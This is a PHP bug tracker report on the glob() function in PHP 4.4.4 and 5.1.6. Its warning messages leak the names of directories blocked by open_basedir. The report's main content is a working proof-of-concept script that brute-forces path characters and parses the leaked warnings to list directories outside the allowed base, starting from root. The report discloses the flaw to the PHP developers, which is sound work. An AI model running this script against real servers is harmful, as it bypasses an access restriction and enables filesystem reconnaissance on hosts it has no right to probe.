From: anton dot kirsanov at gmail dot com Operating system: ALL PHP version: 5.1.6 PHP Bug Type: Safe Mode/open_basedir Bug description: Bug in warning message when glob() function access to unallowed path.
Description: ------------ When open_basedir is enabled, glob() function don`t show files in unallowed directories, however in warning message present file or directory name that access is denied. If you recursive parse a warning messages for extract pathes, you a get listing of unallowed directories (see POC code). I`m, tested this bug on PHP 5.1.6 and 4.4.4, everywhere the result is equal. Reproduce code: --------------- <?php // ----------------------------------------------------- // POC by Kirsanov Anton ( anton.kirsanov[at]gmail.com ) // // Description: // Bug in warning message for glob() function allow show listing unallowed directories when open_basedir is enabled. // // Risk: // Possible directory listing, when open_basedir is enabled. // Testing on PHP 4.4.4, 5.1.6. error_reporting(E_ALL); ini_set("display_errors", 0); ini_set("track_errors", 1); if(!ini_get('open_basedir')) die('open_basedir not present'); $chars = "._-1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"; $z = array(); get_c("/", $z); // show contents of root directory print_r($z); function get_c($path, &$o) { global $chars; for($i=0; $i < strlen($chars); $i++) { $p = $path . $chars[$i]; $r = glob($p . "*"); if(!$r && $php_errormsg) { if(( preg_match("/open\_basedir restriction in effect\. File\((.*)\) is/iU", $php_errormsg, $t) || preg_match("/is not allowed to access (.*) owned/iU", $php_errormsg, $t)) && !$o[$t[1]]) { $o[$t[1]] = $t[2]; get_c($p, $o); } } } } ?> Expected result: ---------------- <?php glob("/*"); ?> Warning: glob(): open_basedir restriction in effect. is not allowed to access (/) owned ... Actual result: -------------- <?php glob("/*"); ?> ---- Warning: glob(): open_basedir restriction in effect. is not allowed to access (/bin/) owned ... ---- Warning message has been disclose path - /bin/ -- Edit bug report at http://bugs.php.net/?id=39339&edit=1 -- Try a CVS snapshot (PHP 4.4): http://bugs.php.net/fix.php?id=39339&r=trysnapshot44 Try a CVS snapshot (PHP 5.2): http://bugs.php.net/fix.php?id=39339&r=trysnapshot52 Try a CVS snapshot (PHP 6.0): http://bugs.php.net/fix.php?id=39339&r=trysnapshot60 Fixed in CVS: http://bugs.php.net/fix.php?id=39339&r=fixedcvs Fixed in release: http://bugs.php.net/fix.php?id=39339&r=alreadyfixed Need backtrace: http://bugs.php.net/fix.php?id=39339&r=needtrace Need Reproduce Script: http://bugs.php.net/fix.php?id=39339&r=needscript Try newer version: http://bugs.php.net/fix.php?id=39339&r=oldversion Not developer issue: http://bugs.php.net/fix.php?id=39339&r=support Expected behavior: http://bugs.php.net/fix.php?id=39339&r=notwrong Not enough info: http://bugs.php.net/fix.php?id=39339&r=notenoughinfo Submitted twice: http://bugs.php.net/fix.php?id=39339&r=submittedtwice register_globals: http://bugs.php.net/fix.php?id=39339&r=globals PHP 3 support discontinued: http://bugs.php.net/fix.php?id=39339&r=php3 Daylight Savings: http://bugs.php.net/fix.php?id=39339&r=dst IIS Stability: http://bugs.php.net/fix.php?id=39339&r=isapi Install GNU Sed: http://bugs.php.net/fix.php?id=39339&r=gnused Floating point limitations: http://bugs.php.net/fix.php?id=39339&r=float No Zend Extensions: http://bugs.php.net/fix.php?id=39339&r=nozend MySQL Configuration Error: http://bugs.php.net/fix.php?id=39339&r=mysqlcfg